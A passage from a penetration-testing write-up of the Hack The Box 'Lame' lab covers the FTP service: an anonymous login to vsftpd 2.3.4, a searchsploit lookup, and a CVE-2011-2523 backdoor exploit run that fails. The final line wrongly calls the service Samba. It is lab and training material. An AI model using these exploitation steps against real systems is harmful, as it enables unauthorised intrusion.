FTP
Nmap discovered a FTP server on the target port 21
The running service is vsftpd 2.3.4
while vsftp 2.3.4 is known to have a backdoor vulnerability, I will take a look at the content hosted inside
Null Session
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ ftp $IP
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||23512|).
150 Here comes the directory listing.
226 Directory send OK.While the target FTP server allows anonymous login, nothing seems to be inside
Vulnerability
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ searchsploit vsftp 2.3.4
-------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
-------------------------------------------------------- ---------------------------------
shellcodes: No Results
papers: No ResultsI have exploit available locally.
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ python3 CVE-2011-2523.py $IP 21 whoami
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...
[!] failed to connect to backdoor on 10.10.10.3:6200The target Samba instance is not vulnerable to CVE-2011-2523